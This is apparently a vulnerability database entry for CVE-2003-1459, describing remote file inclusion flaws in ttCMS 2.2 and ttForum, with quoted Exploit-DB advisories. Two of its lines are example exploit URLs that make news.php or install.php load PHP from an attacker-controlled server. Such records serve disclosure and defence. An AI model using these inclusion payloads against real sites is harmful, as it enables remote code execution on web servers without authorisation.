CVE-2003-1459
Published 2003-12-31
Priority: P3 (36), medium, 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 7.07% (93.4th percentile)
Multiple PHP remote file inclusion vulnerabilities in ttCMS 2.2 and ttForum allow remote attackers to execute arbitrary PHP code via the (1) template parameter in News.php or (2) installdir parameter in install.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ttcms | ttcms | — | — |
| ttcms | ttforum | — | — |
No detection rules found.
Exploit-DB
ttCMS 2.2 / ttForum 1.1 - 'news.php?template' Remote File Inclusion
exploitdb·2003-05-09
---
source: https://www.securityfocus.com/bid/7542/info
A remote file include vulnerability has been reported for both ttForum and ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'News.php' and 'Install.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL.
Successful exploitation will result in the execution of the attacker-supplied PHP instructions with the privileges of the web server.
There are conflicting reports about whether or not this issue exists. The vendor has stated that exploitation of this issue is not possible.
http://www.example.com/ttforum/index.php?action=news;board=1;
template=http://www.yourserver.com/modules/forum/helpadmin;ex
Exploit-DB
ttCMS 2.2 / ttForum 1.1 - 'install.php?installdir' Remote File Inclusion
exploitdb·2003-05-09
---
source: https://www.securityfocus.com/bid/7542/info
A remote file include vulnerability has been reported for both ttForum and ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'News.php' and 'Install.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL.
Successful exploitation will result in the execution of the attacker-supplied PHP instructions with the privileges of the web server.
There are conflicting reports about whether or not this issue exists. The vendor has stated that exploitation of this issue is not possible.
http://www.example.com/install.php?step=7&installdir=http://yourserver/Settings.php
No writeups or analysis indexed.
http://securityreason.com/securityalert/3278
http://www.securityfocus.com/archive/1/321000
http://www.securityfocus.com/bid/7542
https://exchange.xforce.ibmcloud.com/vulnerabilities/12271